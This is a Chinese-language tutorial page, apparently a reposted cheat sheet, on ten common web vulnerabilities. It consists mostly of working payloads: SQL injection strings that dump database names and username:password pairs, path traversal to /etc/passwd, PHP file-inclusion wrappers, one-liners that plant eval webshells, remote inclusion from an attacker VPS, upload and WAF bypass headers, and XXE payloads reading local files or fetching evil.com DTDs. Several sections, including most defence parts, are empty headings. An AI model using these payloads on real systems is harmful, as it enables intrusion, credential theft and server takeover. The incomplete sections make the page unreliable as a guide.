常見Web十大漏洞,常見Web漏洞
當前位置:點晴教程→知識管理交流
→『 技術文檔交流 』
目錄 一、SQL注入漏洞 分為以下五種注入方式: 查找SQL注入漏洞 Union注入 布爾盲注 報錯注入 時間盲注 時間型盲注的加速方式 二、任意文件下載 漏洞原理: 產生原因: 利用條件: 漏洞發現: 漏洞利用方法: 漏洞防護: 三、敏感文件 四、文件包含 漏洞利用 PHP中的封裝協議(偽協議) file:// php:// zip:// & bzip2:// & zlib:// data:// phar:// 遠程文件包含(RFL) 漏洞利用 代碼審計 漏洞防護 五、文件上傳 漏洞原理 繞過 黑名單繞過: 白名單繞過: 黑白名單通用 基于WAF: 文件加載檢測(文件內容檢測) 漏洞防護 六、命令執行 漏洞原理 兩個條件 命令執行漏洞帶來的危害 列子 漏洞防護 七、代碼執行 PHP敏感函數代碼執行 八、XML外部實體注入 XML基礎 惡意引入外部實體的三種方式 一、本地引入 二、遠程引入 三、遠程引入2 九、xss 漏洞 漏洞原理: xss 分類:(三類) 十、CSRF & SSRF CSRF: SSRF: 一、SQL注入漏洞分為以下五種注入方式:布爾盲注:根據返回頁面判斷條件真假 延時注入:用頁面返回時間是否增加判斷是否存在注入 報錯注入:頁面會返回錯誤信息 聯合查詢注入:可以使用union的情況下 堆疊注入:可以同時執行多條語句 (mysql_multi_query() 支持多條sql語句同時執行,就是個;分隔,成堆的執行sql語句) 查找SQL注入漏洞Union注入id=-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema='數據庫名' and table_name='表名' --+ union select 1,2,3,group_concat(name,password) from 表名 用字段名從表中取數據 group_concat(str1,str2,...) 連接一個組的所有字符串 布爾盲注?id=1' and 1=1 --+ 頁面返回正常 ?id=1' and 1=2 --+ 頁面返回不正常 1'and length(database())>=1--+ 頁面返回正常 1'and length(database())>=13--+ 頁面返回正常 1'and length(database())>=14--+ 頁面返回錯誤 由此判斷得到數據庫名的長度是13個字符 字符判斷獲取數據庫名; 數據庫名的范圍一般在a~z、0~9之內,可能還會有特殊字符 "_"、"-" 等,這里的字母不區分大小寫。 ' and substr(database(),1,1)='a'--+ ' and substr(database(),2,1)='a'--+ substr 的用法和 limit 有區別,limit從 0 開始排序,這里從 1 開始排序。 用Burp爆破字母a的位置,即可得到數據庫名每個位置上的字符。 還可以用ASCII碼查詢 a 的ASCII碼是97,在MySQL中使用ord函數轉換ASCII,所以逐字符判斷語句可改為: ' and ord(substr(database(),1,1))=97--+ ASCII碼表中可顯示字符的范圍是:0~127 ' and substr((select table_name from information_schema.tables where table_schema='數據庫名' limit 0,1),1,1)='a'--+ 修改1,1前邊的1~20,逐字符猜解出第一個表的名 修改limit的0,1前邊的0~20,逐個猜解每個表 ' and substr((select column_name from information_schema.columns where table_schema='數據庫名' and table_name='表名' limit 0,1),1,1)='a'--+ 修改1,1前邊的1~20,逐字符猜解出第一個字段的名 修改limit的0,1前邊的0~20,逐個猜解每個字段 報錯注入xpath語法錯誤 extractvalue() 查詢節點內容 updatexml() 修改查詢到的內容 它們的第二個參數都要求是符合xpath語法的字符串 如果不滿足要求則會報錯,并且將查詢結果放在報錯信息里 這二者里面傳參第一個是兩個第二個是三個,但都是改變xpath 主鍵重復(duplicate entry) floor() --返回小于等于該值的最大整數 只要是count,rand(),group by 三個連用就會造成這種主鍵重復報錯 ' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+ 0x7e是"~"符號的16進制,在這作為分隔符(喜歡哪個用哪個) ' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='數據庫名' limit 0,1),0x7e),1)--+ ' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='數據庫名' and table_name='表名' limit 0,1),0x7e),1)--+ ' and updatexml(1,concat(0x7e,(select concat(username,0x3a,password) from users limit 0,1),0x7e),1)--+ 其它函數payload語法: --extractvalue ' and extractvalue(1,concat(0x7e,(select database()),0x7e))--+ --floor() ' and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+ 時間盲注' and sleep(5) and 1=1--+ 頁面返回不正常,延時5秒 ' and sleep(5) and 1=2--+ 頁面返回不正常,不延時 and if(length(database())>1,sleep(5),1) --if(條件表達式,真,假) --C語言的三目運算符類似 and if(substr(database(),1,1)='a',sleep(5),1)--+ 時間型盲注的加速方式二、任意文件下載漏洞原理:產生原因:利用條件:漏洞發現:
漏洞利用方法:index.php?f=../../../../../../../../../etc/passwd index.php?f=../../../index.php index.php?f=file:///etc/passwd readfile.php?file=/etc/passwd readfile.php?file=../../../../../etc/passwd readfile.php?file=../../../../../../../etc/passwd%00 // 00截斷 注: 當參數f的參數值為php⽂件時,若是⽂件被解析則是⽂件包含漏洞, 若顯⽰源碼或提⽰下載則是⽂件查看與下載漏洞。 漏洞防護:三、敏感文件/root/.bash_history //用戶終端歷史命令記錄文件 /root/.mysql_history //mysql歷史命令記錄文件 /proc/mounts //記錄系統掛載設備 /porc/config.gz //內核配置文件 /var/lib/mlocate/mlocate.db //全文件路徑 /porc/self/cmdline //當前進程的cmdline參數 /usr/local/app/apache2/conf/httpd.conf //apache2默認配置文件 /usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虛擬網站設置 /usr/local/app/php5/lib/php.ini //php相關設置 /etc/httpd/conf/httpd.conf //apache配置文件 /etc/php5/apache2/php.ini //ubuntu系統的默認路徑 apache-tomcat-8.5.51/conf/tomcat-users.xml //tomcat的角色(授權用戶)配置文件 apache-tomcat-8.5.51/conf/server.xml //tomcat的主配置文件 apache-tomcat-8.5.51/conf/web.xml //tomcat應用程序的部署描述符文件 apache-tomcat-8.5.51/logs/catalina.out //即tomcat的標準輸出和標準出錯,所有輸出到這兩個位置的都會進入catalina.out,這里包含tomcat運行自己輸出的日志以及應用里向console輸出的日志。 PHP 獲取inc/config.php文件,獲得數據庫連接字符串中的口令信息; ASP 獲取inc/conn.asp文件,獲得數據庫連接字符串口令,得到數據庫口令。若是ACCESS數據庫,可以得到數據庫路徑,再下載數據庫內容; ASPX 獲取網站根目錄web.config文件,獲得數據庫連接字符串中的口令信息; 獲取bin/*.dll文件,獲取網站源碼(不完整代碼),使用.NET reflector工具打開編譯后的dll文件; JSP 獲取conf/tomcat-user.xml文件,獲得tongcat管理界面的口令信息,上傳war包GetShell; 獲取WEB-INF/Web.xml文件,獲得數據庫連接字符串中的口令信息。 四、文件包含漏洞利用(1)include()、include_noce()、require()、require_once()等函數通過動態變量的方式引入包含文件; (2)用戶能夠控制該動態變量。 ?arg=/etc/passwd ?arg=php://filter/read=convert.base64-encode/resource=config.php 這樣能看到php文件的源碼 ?php if(isset($_GET['arg'])) { include($_GET['arg'].".php"); }else{ include(index.php); } ?> PHP中的封裝協議(偽協議)file://1. file://[文件的絕對路徑和文件名] http://127.0.0.1/include.php?file=file://C:\phpStudy\PHPTutorial\WWW\phpinfo.txt 2. file://[文件的相對路徑和文件名] http://127.0.0.1/include.php?file=./phpinfo.txt 3. file://[網絡路徑和文件名] http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt php://allow_url_fopen:off/on allow_url_include : 部分需要on (下面列出) php://input php://stdin php://memory php://temp 1. php://filter/read=convert.base64-encode/resource=[文件名] //讀取文件源碼 http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php 2.php://input + [POST DATA]執行php代碼 http://127.0.0.1/include.php?file=php://input [POST DATA部分] <?php phpinfo(); ?> 3.若有寫入權限,[POST DATA部分] 寫入一句話木馬 <?php fputs(fopen('shell.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?> zip:// & bzip2:// & zlib://1.zip://[壓縮文件絕對路徑]%23[壓縮文件內的子文件名](#編碼為%23) <!--壓縮 phpinfo.txt 為 phpinfo.zip ,壓縮包重命名為 phpinfo.jpg ,并上傳--> http://127.0.0.1/include.php? file=zip://C:\phpStudy\PHPTutorial\WWW\phpinfo.jpg%23phpinfo.txt 2.compress.bzip2://file.bz2 <!--壓縮 phpinfo.txt 為 phpinfo.bz2 并上傳(同樣支持任意后綴名)--> http://127.0.0.1/include.php? file=compress.bzip2://C:\phpStudy\PHPTutorial\WWW\phpinfo.bz2 3.compress.zlib://file.gz <!--壓縮 phpinfo.txt 為 phpinfo.gz--> http://127.0.0.1/include.php? file=compress.zlib://C:\phpStudy\PHPTutorial\WWW\phpinfo.gz data://1.data://text/plain, http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?> 2.data://text/plain;base64, http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b phar://http://127.0.0.1/include.php?file=phar://C:/phpStudy/PHPTutorial/WWW/phpinfo.zip/phpinfo.txt 遠程文件包含(RFL)漏洞利用?arg=http://攻擊者的VPS/shell.txt #會在網站目錄生成名為 shell.php 的一句話木馬 <?php fputs(fopen('./shell.php','w'),'<?php @eval($_POST[123]) ?>'); ?> 代碼審計include() //使用此函數,只有代碼執行到此函數時才將文件包含進來,發生錯誤時只警告并繼續執行。 inclue_once() //功能和前者一樣,區別在于當重復調用同一文件時,程序只調用一次。 require() //使用此函數,只要程序執行,立即調用此函數包含文件發生錯誤時,會輸出錯誤信息并立即終止程序。 require_once() //功能和前者一樣,區別在于當重復調用同一文件時,程序只調用一次。 漏洞防護
五、文件上傳漏洞原理繞過黑名單繞過:test.php:1.jpg //會被windows系統自動去掉不符合規則符號后面的內容 test.php::$DATA //會被windows系統自動去掉不符合規則符號后面的內容 白名單繞過:1)00截斷: 抓包修改文件名后綴為“php .jpg”,再將空格的十六進制改為00(系統在對文件名進行讀取時,如果遇到0x00,就會認為讀取已經結束,系統按二進制或十六進制讀取文件,遇到ASCII碼為0的位置就停止,而這個ASCII為0的位置在十六進制中是00); 2).htaccess解析漏洞: (只適用于Apache中allow override all、loadmodule rewrite_module/mod_rewrite.so #rewrite模塊為開啟狀態):先上傳.htaccess文件(AddType application/x-httpd-php .jpg),再上傳一個圖片馬文件(jpg),上傳的jpg文件都會以php文件格式解析。 3)Content-Type: 先上傳正常的圖片文件,查看Content-Type類型。上傳腳本文件(AddType aaplication/x-httpd-php .jpg #將所有后綴為.jpg的文件作為php文件解析),將Content-Type類型改為查看到的類型(image/jpeg、imagepng、imagegif等) 4)Apache解析漏洞: Apache從右向左解析,若不能夠解析最右的后綴,會遞歸向前解析,直到解析道能夠解析為止,否則會報錯。 5).user.ini: 適用于服務器使用CGI/FastCGI模式且目錄下要有可執行的php文件,文件內容“auto_prepend_file=a.jpg # a.jpg中符合php語言的代碼會被執行”。 6)文件頭檢測: 上傳圖片馬,再修改后綴為可解析腳本語言;或上傳一句話木馬,再將文件中添加正常格式文件頭(GIF89a等)。 黑白名單通用<FilesMatch "shell.jpg"> SetHandler application/x-httpd-php </FilesMatch> //上傳shell.jpg文件,將解析為php運行 基于WAF:1)換行繞過 Content-Disposition:form-data;name="file";filename="1.php" Content-Disposition:form-data;name="file";file name="1.php" Content-Disposition:form-data;name="file";filename= "1.php" 2)多個等號繞過 Content-Disposition:form-data;name="file";filename=="1.php" 3)增加文件大小,類似于垃圾字符 Content-Disposition:form-data; qqqqqqqq…qqqqqqqqqqq;name="file";filename="1.php" 4)去掉或替換引號繞過 Content-Disposition:form-data;name=file;filename=1.php Content-Disposition:form-data;name='file';filename="1.php" 5)增加filename干擾攔截 Content-Disposition:form-data;name="file";filename= ;filename="1.php" 6)混淆waf匹配字段 a.混淆form-data Content-Disposition:name="file";filename="1.php" //去除form-data Content-Disposition:qqqqq="qweqwe";name="file"; filename="1.php" // 替換form-data為垃圾值 Content-Disposition: form-data ; name="file"; filename="1.php" // form-data后加空格 Content-Disposition: for+m-data; name="file"; filename="1.php" // form-data中加+號 b.混淆ConTent-Disposition COntEnT-DIsposiTiOn: form-data; name="file"; filename="1.php" // 大小寫混淆 Content-Type: image/gif Content-Disposition: form-data; name="file"; filename="1.php" //調換Content-Type和ConTent-Disposition的順序 Content-Type: image/gif Content-Disposition: form-data; name="file"; filename="1.php" Content-Type: image/gif //增加額外的頭 AAAAAAAA:filename="aaa.jpg"; Content-Disposition: form-data; name="file"; filename="1.php" Content-Type: image/gif //增加額外的頭 Content-Length: 666 Content-Disposition: form-data; name="file"; filename="1.php" Content-Type: image/gif //增加額外的頭 Content-Disposition: form-data; name="file_x";;; filename="test.php" //多個分號,導致可能解析不到文件名 7)雙文件繞過: 例如安全狗總是以最后一個Content-Disposition中的值作為接收參數進行檢測,一些中間件例如IIS6.0總是以第一個Content-Disposition中的值作為接收參數。 8)容器與waf對Bounday要求規則不一致 Content-Type: multipart/form-data; boundary=—————————471114117352599 Content-Length: 253 —————————–471114117352599 Content-Disposition: form-data; name="file1"; filename="shell.asp" Content-Type: application/octet-stream <%eval request("a")%> —————————–471114117352599– 一些waf會認為兩段Boundary不一致的數據是無意義的,不進行檢測,而容器并沒有嚴格要求,正常接收數據。 9) 條件競爭 一些情況再上傳文件時,先上傳到臨時目錄,然后再檢測,檢測到再刪除。例如可以上傳生成一句話木馬的文件(fputs(fopen('shell.php','w'),'') ; 上傳同時瘋狂重復發包訪問此文件,就有可能會在文件被刪除之前生成webshell文件shell.php。 文件加載檢測(文件內容檢測)漏洞防護1、使用白名單限制可以上傳的文件擴展名 2、注意0x00截斷攻擊(PHP更新到最新版本) 3、對上傳后的文件統一隨機命名,不允許用戶控制擴展名 4、上傳文件的存儲目錄禁用執行權限 六、命令執行漏洞原理system() //執行外部程序,并且顯示輸出 exec() //執行一個外部程序 shell_exec() //通過 shell 環境執行命令,并且將完整的輸出以字符串的方式返回 passthru() //執行外部程序并且顯示原始輸出 pcntl_exec() //在當前進程空間執行指定程序 popen() //打開進程文件指針 proc_open() //執行一個命令,并且打開用來輸入/輸出的文件指針 反引號 令拼接到正常命令中,從而造成命令執行攻擊。 兩個條件
命令執行漏洞帶來的危害繼承Web服務程序的權限去執行系統命令(任意代碼)或讀寫文件 反彈shell 控制整個網站甚至控制服務器 進一步內網滲透 等 列子<?php $test = $_GET['cmd']; system($test); ?> 漏洞防護七、代碼執行PHP敏感函數代碼執行eval() //把字符串作為PHP代碼執行 assert() //檢查一個斷言是否為 FALSE,可用來執行代碼 preg_replace() //執行一個正則表達式的搜索和替換 call_user_func()//把第一個參數作為回調函數調用 call_user_func_array()//調用回調函數,并把一個數組參數作為回調函數的參數 array_map() //為數組的每個元素應用回調函數 八、XML外部實體注入XML基礎<?xml version="1.0" ?> <!--XML聲明--> <!DOCTYPE note [ <!ELEMENT note (to,from,heading,bodys)> <!ELEMENT to (#PCDATA)> <!ELEMENT from (#PCDATA)> <!ELEMENT heading (#PCDATA)> <!ELEMENT bodys (#PCDATA)> ]><!--文檔類型定義--> <note> <to>北京</to><from>石家莊</from> <heading>wintrysec</heading><bodys>wintrysec.github.io</bodys> </note><!--文檔元素--> <message>此文本會被解析</message> <name><first>Bill</first><last>Gates</last></name> <!--內部聲明DTD--> <!DOCTYPE 根元素 [元素聲明]> <!--引用外部DTD--> <!DOCTYPE 根元素 SYSTEM “文件名”> <!--或者--> <!DOCTYPE 根元素 PUBLIC “public_ID” “文件名”> <!--DTD實體是用于定義引用普通文本或特殊字符的快捷方式的變量,可以內部聲明或外部引用。--> <!--內部聲明實體--> <!ENTITY 實體名稱 “實體的值"> <!--引用外部實體--> <!ENTITY 實體名稱 SYSTEM “URI"> <!--或者--> <!ENTITY 實體名稱 PUBLIC “public_ID" “URI"> 惡意引入外部實體的三種方式一、本地引入<?xml version="1.0" ?> <!--XML聲明--> <!DOCTYPE x[ <!ENTITY wintrysec SYSTEM "file:///etc/passwd"> ]><!--文檔類型定義--> <test>&wintrysec;</test><!--文檔元素--> 二、遠程引入<?xml version="1.0" ?> <!--XML聲明--> <!DOCTYPE x[ <!ENTITY %d SYSTEM "http://evil.com/evil.dtd"> %d; ]><!--文檔類型定義--> <test>&wintrysec;</test><!--文檔元素--> <!ENTITY wintrysec SYSTEM “file:///etc/passwd"> 三、遠程引入2<?xml version="1.0" ?> <!DOCTYPE x SYSTEM "http://evil.com/evil.dtd"> <test>&wintrysec;</test> 九、xss 漏洞漏洞原理:xss 分類:(三類)十、CSRF & SSRFCSRF:SSRF:該文章在 2024/2/29 22:57:02 編輯過 |
關鍵字查詢
相關文章
正在查詢... |